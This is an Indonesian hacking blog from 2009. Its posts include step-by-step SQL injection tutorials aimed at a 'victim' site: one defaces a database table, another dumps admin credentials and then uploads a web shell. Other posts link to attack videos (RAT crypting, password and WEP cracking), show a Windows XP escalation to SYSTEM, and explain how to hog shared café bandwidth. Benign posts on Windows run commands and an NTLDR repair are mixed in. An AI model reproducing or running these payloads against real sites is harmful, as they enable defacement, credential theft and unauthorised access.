Jumat, 18 September 2009

+Deface dengan SQL injection+

Nie gw kasih contoh nya.......

=> http://korban.site/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection, kita akan menambahkan satu karakter ' setelah kode artikel mejadi

=> http://korban.site/artikel.asp?naskah_id=102'

Terjadi Error???

Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Unclosed quotation mark before the character string ‘102' order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs

terus qt coba lagi dgn menambahkan

having 1=1;–

mis :

=> http://korban.site/artikel.asp?naskah_id=102' having 1=1;–




maka akan terjadi errornya seperti ini


Microsoft OLE DB Provider for SQL Server error ‘80040e14''

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230


py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom

sekarang yg harus kita lakukan adalah mencari tabel berikutnya
mis :

=> http://korban.site/artikel.asp?naskah_id=102 group by py_Naskah.naskah_id having 1=1;–

terjadi error lagi???


Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230


sekarang kita dapat py_Naskah.category
berarti ditambahkan di urlnya
mis :

=> http://korban.site/artikel.asp?naskah_id=102' group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error lagi????


Microsoft OLE DB Provider for SQL Server error ‘80040e14'

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230


rubah lagi urlnya menjadi

=> http://korban.site/artikel.asp?naskah_id=102' group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

kita sudah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya

=> http://korban.site/artikel.asp?naskah_id=102' update py_Naskah set title=’Hacked by lxmp2t’;–

gitu aje. semoga bisa berguna dan dapat dipelajari oke...




Baca Selengkapnya...

Jumat, 11 September 2009

Tutorial SQL Injection + Backdooring
--------------------------------------------------------
SQL Injection + Backdooring by Arob
--------------------------------------------------------
---->>> 1
Kita tetapkan target terlebih dahulu
contoh: [site]/news_Event/newsDetail.php?ID=2

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
[site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2'


---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]//news_Event/newsDetail.php?ID=-2+order+by+1--

sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-2+order+by+1--
[site]/news_Event/newsDetail.php?ID=-2+order+by+2--
[site]/news_Event/newsDetail.php?ID=-2+order+by+3--
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

sehingga muncul error atau hilang pesan error...
misal:
[site]/news_Event/newsDetail.php?ID=-2+order+by+5--

berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--


--->>> 3


--->>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
[site]/news_Event/newsDetail.php?ID=-2+order+by+4--

ok ,yg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


--->>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"


--->>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

[site]news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--


--->>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

contoh kata yang keluar adalah adminID,Name,password

maka
[site]/news_Event/newsDetail.php?ID=-2+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3,4+from+admin--

Nah dah nemu ID dan password-nya sekarang Very Happy

ket: 0x3a sama dengan : <- titik dua --->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY........

Baca Selengkapnya...

Rabu, 09 September 2009

Run Commands
Calc - Calculator
Cfgwiz32 - ISDN Configuration Wizard
Charmap - Character Map
Chkdisk - Repair damaged files
Cleanmgr - Cleans up hard drives
Clipbrd - Windows Clipboard viewer
Cmd - Opens a new Command Window (cmd.exe)
Control - Displays Control Panel
Dcomcnfg - DCOM user security
Debug - Assembly language programming tool
Defrag - Defragmentation tool
Drwatson - Records programs crash & snapshots
Dxdiag - DirectX Diagnostic Utility


Explorer - Windows Explorer
Fontview - Graphical font viewer
Ftp - ftp.exe program
Hostname - Returns Computer's name
Ipconfig - Displays IP configuration for all network adapters
Jview - Microsoft Command-line Loader for Java classes
MMC - Microsoft Management Console
Msconfig - Configuration to edit startup files
Msinfo32 - Microsoft System Information Utility
Nbtstat - Displays stats and current connections using NetBios over TCP/IP
Netstat - Displays all active network connections
Nslookup- Returns your local DNS server
Ping - Sends data to a specified host/IP
Regedit - registry Editor
Regsvr32 - register/de-register DLL/OCX/ActiveX
Regwiz - Reistration wizard
Sfc /scannow - Sytem File Checker
Sndrec32 - Sound Recorder
Sndvol32 - Volume control for soundcard
Sysedit - Edit system startup files (config.sys, autoexec.bat, win.ini, etc.)
Taskmgr - Task manager
Telnet - Telnet program
Tracert - Traces and displays all paths required to reach an internet host
Winipcfg - Displays IP configuration

Management Consoles

certmgr.msc - Certificate Manager
ciadv.msc - Indexing Service
compmgmt.msc - Computer management
devmgmt.msc - Device Manager
dfrg.msc - Defragment
diskmgmt.msc - Disk Management
fsmgmt.msc - Folder Sharing Management
eventvwr.msc - Event Viewer
gpedit.msc - Group Policy -XP Pro only
iis.msc - Internet Information Services
lusrmgr.msc - Local Users and Groups
mscorcfg.msc - Net configurations
ntmsmgr.msc - Removable Storage
perfmon.msc - Performance Manager
secpol.msc - Local Security Policy
services.msc - System Services
wmimgmt.msc - Windows Management

Baca Selengkapnya...

Sabtu, 22 Agustus 2009

NTLDR is missing









Dari dulu sampai sekarang permasalahan seperti yang saya tulis di judul masih menjadi pertanyaan yang cukup ngetop di beberapa milis tentang komputer. Walaupun sudah dijawab berulangkali oleh senior senior milis, tetap saja hari hari berikutnya ada yang nanya lagi. Mungkin karena beberapa anggota milis malas untuk melihat arsip dan sifat dari milis yang mengalir terus sehingga kerap terjadi pembahasan suatu topik secara berulang ulang...
Bahkan saya sendiri pernah mengalami nya...


Permasalahan atau pesan missing NTLDR biasanya muncul saat komputer melakukan booting pertama kali. Hilangnya file system ini bisa terjadi karena kesalahan saat melakukan shutdown, virus, instalasi program tertentu dan lain lain. Biasanya komputer gagal untuk masuk ke system operasi sehingga untuk memperbaikinya agak sedikit rumit.

Jika komputer menggunakan partisi dengan system file FAT32, caranya lebih mudah daripada NTFS. Hal ini lebih karena faktor keamanan yang lebih kuat di NTFS sehingga membongkarnya pun rada rada sulit. Cukup dengan melakukan booting menggunakan startup disk Win98, lalu menyalin file NTLDR atau NTDETECT.COM dari direktori i386 ke direktori C:\.

Sedangkan untuk system files NTFS, langkah langkah yang bisa dilakukan antara lain :

1. Masukan dan boot menggunakan CD WindowsXP.
2. Saat muncul pilihan untuk melakukan Repair Windows, tekan tombol R pada keyboard.
3. Lalu tekan nomor yang sesuai dengan lokasi instalasi Windows yang akan diperbaiki, biasanya pilih angka 1.
4. Ketik password administrator saat diminta, bila sebelumnya kita tidak pernah mengisi password administrator saat instalasi Windows pertama kali, langsung tekan Enter.
5. Ketik perintah berikut : (X: merupakan drive pengganti untuk CDROM).
COPY X:\i386\NTLDR C\:
COPY X:\i386\NTDETECT.COM C:\
6. Keluarkan CD dari CDROM lalu ketik exit.

Baca Selengkapnya...

Jumat, 24 Juli 2009

Video Tutorial Hacking
Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya. Langsung aja download. Artikel ini aku ambil dari cyberphreaking.com dan tempat lain . Jika ada komplain maka artikel ini akan di unpublish,


1. DeluxeBB 1.06 Exploit (9mb)
Remote SQL Injection Exploit

Code:
http://rapidshare.com/files/11156227/100_live585.rar

2. NetBios Live Hack (5mb)
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)

Code:
http://rapidshare.com/files/11158778/101_netbios585.rar

3. Classified (7mb)
Shows how site classified is Hacked.

Code:
http://rapidshare.com/files/11158779/102_site585.rar

4. NASA (2mb)
NASA Department website Hacked.

Code:
http://rapidshare.com/files/11158865/92_meh.zip

5. Linux Network Monitor (5mb)
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.

Code:
http://rapidshare.com/files/11158774/95_CBT4Free-Linux_Network_Monitor.zip

6. Linux DNS Server (11mb)
This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.

Code:


7. Windows Web Server (6mb)
This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.

Code:
http://rapidshare.com/files/11158787/98_Windows_Web_Server.zip

8. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.

Code:
http://rapidshare.com/files/11158780/99_Windows_Server_2003_IIS_and_DNS.zip

9. Hacker Defender Movie (8mb)
Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.

Code:
http://rapidshare.com/files/11158766/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar

10. 0-DAY Simple SQL Injection (8mb)
A film project about a cracker with the name zer0day. (Hacking with Linux -php)

Code:
http://rapidshare.com/files/11158799/89_simple-sql-injection.zip

11. wbb (10mb)
wbb portal hacked by XSS.

Code:
http://rapidshare.com/files/11158816/82_wbb_portal.rar

12. Reverse Engineering (20mb)
Reverse Engineering with LD PRELOAD

Code:
http://rapidshare.com/files/ 11158857/83_reverse.rar

13. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration

Code:
http://rapidshare.com/files/11158813/84_SWF_Vul_Demo.rar

14. IPB 1.3 SQL (10mb)
Invasion Power Board 1.3 SQL Injection Exploit

Code:
http://rapidshare.com/files/11158768/86_IPB_SQL.rar

15. Qnix Buffer Overflows (11mb)
Qnix Demonstrating Exploration of Simple Buffer Overflows

Code:
http://rapidshare.com/files/11158770/87_buff.rar

16. ASP SQL (5mb)
Simple ASP Administrator SQL Injection (5mb)

Code:
http://rapidshare.com/files/11158795/88_asp_sql.rar

17. Blind MySQL (9mb)
Demonstration of Blind MySQL Injection (bsqlbf)

Code:
http://rapidshare.com/files/11158804/77_Blind_MySQL.rar

18. D-Link Wireless (3mb)
Intruders D-Link Wireless Access Point Configuration Disclosure

Code:
http://rapidshare.com/files/11158777/78_D-Link_Wireless.rar

19. Mysql bftools (8mb)
Demonstration of Blind MySQL Injection (mysql_bftools)

Code:
http://rapidshare.com/files/11158798/79_mysql_bftools.rar

20. PHP Remote File (9mb)
PHP Remote File Inclusion Windows Backdoor.

Code:
http://rapidshare.com/files/11158805/80_PHP_Remote.rar

21. Cracking WEP in 10 Minutes (30mb)
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this

Code:
http://rapidshare.com/files/11158904/75_see-sec-wepcrack.zip

22. Tunneling Exploits via SSH (18mb)
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.

Code:
http://rapidshare.com/files/11158855/74_see-sec-ssh-dcom-tunneling.zip

23. A classic client side attack (18mb)
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.

Code:
http://rapidshare.com/files/11158860/76_see-sec-client-side.rar

24. C++ Video tutorials (29mb)
Nice C/C++ Shockwave videos.

Code:
http://rapidshare.com/files/11158892/70_C__.rar

25. Interview with Kevin Mitnick (12mb)
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.

Code:
http://rapidshare.com/files/11158829/68_kevin.rar

26. Unix Shell Fundamentals (40mb)
VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.

Code:
http://rapidshare.com/files/11158906/69_UnixShellFund.rar

27. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site.

Code:
http://rapidshare.com/files/11164765/67_MICROSOFT.rar

28. Bitfrost Server Crypting (15mb)
This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.

Code:
http://rapidshare.com/files/11164849/66_Bifrost_Server_Cryp.rar

29. WMF File Code Execution Vulnerability With Metasploit (38mb)
This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help.

Code:
http://rapidshare.com/files/11164775/50_metasploitwmf.swf

30. SSH Dynamic Port Forwarding (30mb)
I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH's dynamic port forwarding (sort of a poor man's VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients.

Code:
http://rapidshare.com/files/11164778/51_sshdynamicportforwarding.swf

31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb)
In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO

Code:
http://rapidshare.com/files/11164810/52_vmwareplayerlivecd.swf

32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb)

Code:
http://rapidshare.com/files/11164807/53_myslax.swf

33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb)

Code:
http://rapidshare.com/files/11164773/54_vmxbuilder.swf

34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb)

Code:
http://rapidshare.com/files/11164795/55_backtrackplaintext.swf

35. Droop's Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb)

Code:
http://rapidshare.com/files/11164818/44_droops1.swf

36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb)

Code:
http://rapidshare.com/files/11164827/45_wigle1.swf

37. Finding Rogue SMB File Shares On Your Network (60mb)

Code:
http://rapidshare.com/files/11164821/46_roguefileshares.swf

38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb)
This video covers some intermediate and advanced Nmap options and is a follow-up to "Basic Nmap Usage" presentation.

Code:
http://rapidshare.com/files/11164843/47_nmap2.swf

38. Metasploit Flash Tutorial
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.

Code:
http://rapidshare.com/files/11164788/48_metasploit1.swf

39. Using VirtualDub and a cheap webcam as a camcorder (10mb)
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.

Code:
http://rapidshare.com/files/11164832/49_cheapcamcorder.avi

40. Cracking Syskey and the SAM on Windows Using Samdump2 and John (25mb)

Code:
http://rapidshare.com/files/11164783/37_samdump2auditor.swf





lanjutan:



Film Hackers - 2 Takedown, banyak yang nanya soal ini kan ?
http://www.warungpl us.com/2007/ 11/20/hackers_ _2_takedown. html


Hackers 3 - Antitrust
http://www.warungpl us.com/2007/ 11/20/hackers_ 3__antitrust. html


Step By Step Pembuatan Antena Kaleng
http://www.warungpl us.com/2007/ 11/05/step_ by_step_pembuata n_antena_ kaleng.html


CBT Nuggets - Nugget Archive Server-MEGA PACK [REUPLOAD], didalamnya ada
tutorial CEH-nya lo... Warning...20 GB
http://www.warungpl us.com/2007/ 11/02/cbt_ nuggets__ nugget_archive_ servermega_ pack.html


Hacking Penetration Testing and Countermeasures Training
http://www.warungpl us.com/2007/ 11/01/hacking_ penetration_ testing_and_ countermeasures_ training. html


Certified Ethical Hacker Exam Preparation FULL PACKAGE
http://www.warungpl us.com/2007/ 10/21/certified_ ethical_hacker_ exam_preparation _full_package. html


Knowledgenet Cisco Academy - All In One, Complete KnowledgeNet Cisco Campus
Collection, Cisco eTraining Courseware
http://www.warungpl us.com/2007/ 10/18/knowledgen et_cisco_ academy__ all_in_one_ complete_ knowledgenet_ cisco_campus_ collection_ cisco_etraining_ courseware. html


Academy Certified Ethical Hacker CBT
http://www.warungpl us.com/2007/ 10/18/academy_ certified_ ethical_hacker_ cbt.html


Ultra H@ckers, tools hacking
http://www.warungpl us.com/2007/ 11/18/ultra_ hckers.html


101 Hacker Programs 2007
http://www.warungpl us.com/2007/ 11/08/101_ hacker_programs_ 2007.html


LinuxCBT Debian Edition
http://www.warungpl us.com/2007/ 08/23/linuxcbt_ debian_edition. html



Baca Selengkapnya...

Selasa, 21 Juli 2009

Mempercepat browsing MoZila
1). Buka Browser Mozilla Firefox
2). Pada Address Bar Ketik : about:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False 4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan [/b]NEW>>INTEGER[/b]
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : about:BLANK


Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :
https://addons.mozilla.org/en-US/firefox…fox&id=125
atau :
https://addons.mozilla.org/extensions/mo…ed=firefox
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: Message ::
– Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT
Klik 2x di settingan dan masukin angka-angka ini – untuk true / false booleans – mereka bakal ganti otomatis begitu klik 2x
Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 64
network.http.max-connections-per-server – 20
network.http.max-persistent-connections-per-proxy – 10
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300
network.http.request.max-start-delay = 0
nglayout.initialpaint.delay = 0
If nglayout.initialpaint.delay doesnt exist, Right click, new integer.

Optional:
Code:
network.http.max-persistent-connections-per-proxy = 10
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0
Tutup mozilla trus jalanin lagi.
Sekarang Mozilla lo mengGILAAAAAAAAAA!!!.
WARNING:
Settingan ini bikin lo ngedonlot situs dengan amat KESURUPAN, BUT bikin Overload luar biasa ke situs yang lo tuju!
Ga bermaksud apa-apa selain kompi lain yang dapat share internet bakal lemod ABEZZZ gara-gara lo sedot benwidnya!
Next tip:
Disable IPv6 di Firefox buat bikin sejuk kecepatan load page lo!!…….. soalnya hamper semua site dah ga make IPv4………..
Buka Firefox………ketik “about:config” (enter)
cari :Network.dns.disableIPv6
Klik 2x buat ngerubah jadi ‘true’ trus restart Firefox.
Lo bakal mempercepat akses browsing………page per page.
Sekarang Firefox bener-bener dah GILAAAAAAAA buat lo!…
nglayout.initialpaint.delay bisa dirubah yg mana aja…bisa 0 bisa 300 ada juga yg set 30…tergantung kebutuhan…..coba 0 dulu…baru nanti kl ga ada perubahan naikan ke 300 atau nilai yg dirasa memuaskan
For ADSL:
Code:
1. Type: about:config
2. Set:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true
3. Lastly right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0?. This value is the amount of time the browser waits before it acts on information it recieves. (Copy from TvM)[/code]
For Dial_ip:
Code:
browser.cache.disk_cache_ssl : true
browser.xul.error_pages.enabled : true
content.interrupt.parsing : true
content.max.tokenizing.time : 3000000
content.maxtextrun : 8191
content.notify.backoffcount : 5
content.notify.interval : 750000
content.notify.ontimer : true
content.switch.threshold : 750000
network.http.max-connections : 32
network.http.max-connections-per-server : 8
network.http.max-persistent-connections-per-proxy : 8
network.http.max-persistent-connections-per-server : 4
network.http.pipelining : true
network.http.pipelining.maxrequests : 8
network.http.proxy.pipelining : true
nglayout.initialpaint.delay : 750
plugin.expose_full_path : true
signed.applets.codebase_principal_support : true

Baca Selengkapnya...

Sabtu, 11 Juli 2009

Menjadi System Pada Windows XP
Pada artikel yang saya buat ini, awalnya ketika saya menggunakan deep freeze saya melihat betapa hebatnya deep freeze v.6 yang mengaku dirinya sebagai system, secara tidak sengaja terlintas difikiran saya bagaimana caranya menjadi system seperti deep freeze yang mengaku dirinya mempunyai privilege pada Windows XP. Ok tehniknya cukup sampai disini, langsung aja saya akan menunjukkan bagaimana caranya menjadi system pada Windows XP.


Langkah pertama :
*?Jalankan Command Prompt (DOS)

*?Ketikkan perintah at 20:33 /interactive "cmd.exe"?
* Ketikkan perintah at untuk melihat schedule task yang aktif

*?Setelah command prompt-nya bertambah satu, maka

*?Jalankan Windows Task Manager dengan menekan tombol ctrl + alt + delete
*?Klik tab PROCESSES
*?Matikan EXPLORER

*?Tutup Windows Task Manager-nya
*?Pada DOS yang terakhir terbuka ketikkan : EXPLORER

*?Selamat, sekarang anda telah menjadi SYSTEM pada Windows XP

Selamat Mencoba!!!


Baca Selengkapnya...

nɐʇ dnʞnɔ qoɹɐ © 2008. Arob Muadz Comunnity by: Echo